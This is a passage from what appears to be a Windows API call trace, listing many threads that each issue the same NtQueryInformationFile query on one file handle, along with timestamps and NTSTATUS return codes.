FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1161 os_tid = 0x30c [0153.447] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efa28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efa28, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1162 os_tid = 0xbfc [0153.448] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fc18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fc18, FileInformation=0x44d8098) returned 0x0 Thread: id = 1163 os_tid = 0x3f8 [0153.450] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434f7b0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434f7b0, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1164 os_tid = 0x6cc [0153.451] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fc18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fc18, FileInformation=0x44d8098) returned 0x0 Thread: id = 1165 os_tid = 0x830 [0153.453] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fa08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fa08, FileInformation=0x44d8098) returned 0x0 Thread: id = 1166 os_tid = 0x75c [0153.455] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47cf7a0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47cf7a0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1167 os_tid = 0x7f0 [0153.457] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fac8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fac8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1168 os_tid = 0x710 [0153.459] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fce0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fce0, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1169 os_tid = 0x5d8 [0153.460] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476fe10, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476fe10, FileInformation=0x44d8098) returned 0x0 Thread: id = 1170 os_tid = 0xbe4 [0153.462] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fdd8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fdd8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1171 os_tid = 0x600 [0153.463] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fb50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fb50, FileInformation=0x44d8098) returned 0x0 Thread: id = 1172 os_tid = 0xbd0 [0153.465] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x478fed0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x478fed0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1173 os_tid = 0x158 [0153.466] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47df8f0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47df8f0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1174 os_tid = 0xbd8 [0153.468] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486f908, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486f908, FileInformation=0x44d8098) returned 0x0 Thread: id = 1175 os_tid = 0xbe8 [0153.470] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfbf0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfbf0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1176 os_tid = 0xbdc [0153.471] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x492fca0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x492fca0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1177 os_tid = 0x5b4 [0153.473] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfac0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfac0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1178 os_tid = 0x614 [0153.474] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfef0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfef0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1179 os_tid = 0x690 [0153.476] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488fa28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488fa28, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1180 os_tid = 0xa68 [0153.478] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bf950, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bf950, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1181 os_tid = 0x7d0 [0153.479] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fa98, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fa98, FileInformation=0x44d8098) returned 0x0 Thread: id = 1182 os_tid = 0x7d8 [0153.481] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fbd0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fbd0, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1183 os_tid = 0x24c [0153.482] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fc08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fc08, FileInformation=0x44d8098) returned 0x0 Thread: id = 1184 os_tid = 0x9f8 [0153.484] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efe98, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efe98, FileInformation=0x44d8098) returned 0x0 Thread: id = 1185 os_tid = 0x798 [0153.485] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x478fb00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x478fb00, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1186 os_tid = 0xa3c [0153.487] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432faf0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432faf0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1187 os_tid = 0x8c0 [0153.489] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfc98, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfc98, FileInformation=0x44d8098) returned 0x0 Thread: id = 1188 os_tid = 0x708 [0153.491] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47cfb50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47cfb50, FileInformation=0x44d8098) returned 0x0 Thread: id = 1189 os_tid = 0xa64 [0153.493] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfa78, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfa78, FileInformation=0x44d8098) returned 0x0 Thread: id = 1190 os_tid = 0xa30 [0153.495] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489f8b0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489f8b0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1191 os_tid = 0x388 [0153.496] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fc38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fc38, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1192 os_tid = 0x760 [0153.498] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488fdf8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488fdf8, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1193 os_tid = 0xa54 [0153.500] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488fe40, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488fe40, FileInformation=0x44d8098) returned 0x0 Thread: id = 1194 os_tid = 0x738 [0153.502] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48efdd0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48efdd0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1195 os_tid = 0x488 [0153.503] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fbc0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fbc0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1196 os_tid = 0x6dc [0153.508] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x480f7b8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x480f7b8, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1197 os_tid = 0x7a0 [0153.510] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489faa8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489faa8, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1198 os_tid = 0x73c [0153.512] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff930, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff930, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1199 os_tid = 0x1c0 [0153.514] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fa00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fa00, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1200 os_tid = 0x7c4 [0153.515] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434f7d0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434f7d0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1201 os_tid = 0x790 [0153.517] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fdf8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fdf8, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1202 os_tid = 0x688 [0153.519] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489f8d8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489f8d8, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1203 os_tid = 0x240 [0153.520] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fb10, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fb10, FileInformation=0x44d8098) returned 0x0 Thread: id = 1204 os_tid = 0x8e0 [0153.522] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485f980, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485f980, FileInformation=0x44d8098) returned 0x0 Thread: id = 1205 os_tid = 0x880 [0153.524] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x494fe00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x494fe00, FileInformation=0x44d8098) returned 0x0 Thread: id = 1206 os_tid = 0x8f0 [0153.525] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffeb8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffeb8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1207 os_tid = 0xa18 [0153.527] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfea0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfea0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1208 os_tid = 0x8a0 [0153.529] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487ff60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487ff60, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1209 os_tid = 0x870 [0153.531] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fd40, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fd40, FileInformation=0x44d8098) returned 0x0 Thread: id = 1210 os_tid = 0x9a0 [0153.533] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fee8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fee8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1211 os_tid = 0x2c4 [0153.534] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fb70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fb70, FileInformation=0x44d8098) returned 0x0 Thread: id = 1212 os_tid = 0x890 [0153.536] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffbb0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffbb0, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1213 os_tid = 0x4e8 [0153.537] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fe60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fe60, FileInformation=0x44d8098) returned 0x0 Thread: id = 1214 os_tid = 0xcc [0153.539] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fb30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fb30, FileInformation=0x44d8098) returned 0x0 Thread: id = 1215 os_tid = 0xd0 [0153.541] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489ff00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489ff00, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1216 os_tid = 0xd4 [0153.542] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x484fe98, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x484fe98, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1217 os_tid = 0xd8 [0153.544] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f8a8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f8a8, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1218 os_tid = 0xdc [0153.545] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47afa68, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47afa68, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1219 os_tid = 0xe0 [0153.547] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fd38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fd38, FileInformation=0x44d8098) returned 0x0 Thread: id = 1220 os_tid = 0xe4 [0153.549] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff9b8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff9b8, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1221 os_tid = 0xe8 [0153.551] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x490ff78, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x490ff78, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1222 os_tid = 0xec [0153.553] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x490f880, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x490f880, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1223 os_tid = 0x748 [0153.555] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47cf8d0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47cf8d0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1224 os_tid = 0xc4 [0153.556] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48aff40, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48aff40, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1225 os_tid = 0x620 [0153.558] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efbf8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efbf8, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1226 os_tid = 0x910 [0153.560] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482f8e8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482f8e8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1227 os_tid = 0x950 [0153.561] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfda0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfda0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1228 os_tid = 0x940 [0153.563] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486f7b8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486f7b8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1229 os_tid = 0x980 [0153.565] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x492f9c8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x492f9c8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1230 os_tid = 0xa10 [0153.568] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47eff18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47eff18, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1231 os_tid = 0x72c [0153.569] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfb70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfb70, FileInformation=0x44d8098) returned 0x0 Thread: id = 1232 os_tid = 0x9e0 [0153.571] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487f7c8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487f7c8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1233 os_tid = 0x9c4 [0153.573] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483f920, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483f920, FileInformation=0x44d8098) returned 0x0 Thread: id = 1234 os_tid = 0xa6c [0153.575] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482ff10, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482ff10, FileInformation=0x44d8098) returned 0x0 Thread: id = 1235 os_tid = 0xb00 [0153.576] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfee0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfee0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1236 os_tid = 0xaf8 [0153.578] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x480f8c8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x480f8c8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1237 os_tid = 0xae4 [0153.579] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f8d0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f8d0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1238 os_tid = 0x344 [0153.594] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x492f7a0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x492f7a0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1239 os_tid = 0x808 [0153.596] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486fe08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486fe08, FileInformation=0x44d8098) returned 0x0 Thread: id = 1240 os_tid = 0x858 [0153.598] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fdd0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fdd0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1241 os_tid = 0x224 [0153.600] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fd30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fd30, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1242 os_tid = 0x4dc [0153.601] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efa40, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efa40, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1243 os_tid = 0x78c [0153.603] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47efab0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47efab0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1244 os_tid = 0xb0 [0153.604] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x478f998, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x478f998, FileInformation=0x44d8098) returned 0x0 Thread: id = 1245 os_tid = 0x314 [0153.606] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47fff28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47fff28, FileInformation=0x44d8098) returned 0x0 Thread: id = 1246 os_tid = 0x804 [0153.608] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x478faa8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x478faa8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1247 os_tid = 0x854 [0153.610] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfeb0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfeb0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1248 os_tid = 0xa78 [0153.612] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48efe20, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48efe20, FileInformation=0x44d8098) returned 0x0 Thread: id = 1249 os_tid = 0x7a8 [0153.614] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430f898, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430f898, FileInformation=0x44d8098) returned 0x0 Thread: id = 1250 os_tid = 0x330 [0153.616] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fe08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fe08, FileInformation=0x44d8098) returned 0x0 Thread: id = 1251 os_tid = 0x3a4 [0153.617] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48efb28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48efb28, FileInformation=0x44d8098) returned 0x0 Thread: id = 1252 os_tid = 0x67c [0153.619] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48efd78, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48efd78, FileInformation=0x44d8098) returned 0x0 Thread: id = 1253 os_tid = 0x5cc [0153.621] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48cf968, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48cf968, FileInformation=0x44d8098) returned 0x0 Thread: id = 1254 os_tid = 0x840 [0153.623] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487f9c0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487f9c0, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1255 os_tid = 0x69c [0153.624] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fbe0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fbe0, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1256 os_tid = 0x6f0 [0153.627] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47cf898, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47cf898, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1257 os_tid = 0x810 [0153.628] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48cf978, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48cf978, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1258 os_tid = 0xa88 [0153.632] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fea8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fea8, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1259 os_tid = 0x43c [0153.633] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476f950, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476f950, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1260 os_tid = 0x670 [0153.635] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479ff80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479ff80, FileInformation=0x44d8098) returned 0x0 Thread: id = 1261 os_tid = 0xa14 [0153.636] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fe48, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fe48, FileInformation=0x44d8098) returned 0x0 Thread: id = 1262 os_tid = 0x990 [0153.638] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fc00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fc00, FileInformation=0x44d8098) returned 0x0 Thread: id = 1263 os_tid = 0x2dc [0153.640] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x494f990, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x494f990, FileInformation=0x44d8098) returned 0x0 Thread: id = 1264 os_tid = 0x74c [0153.642] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483f8f0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483f8f0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1265 os_tid = 0x3c4 [0153.644] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fd30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fd30, FileInformation=0x44d8098) returned 0x0 Thread: id = 1266 os_tid = 0x90 [0153.646] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481f998, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481f998, FileInformation=0x44d8098) returned 0x0 Thread: id = 1267 os_tid = 0x630 [0153.648] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fc38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fc38, FileInformation=0x44d8098) returned 0x0 Thread: id = 1268 os_tid = 0x124 [0153.649] 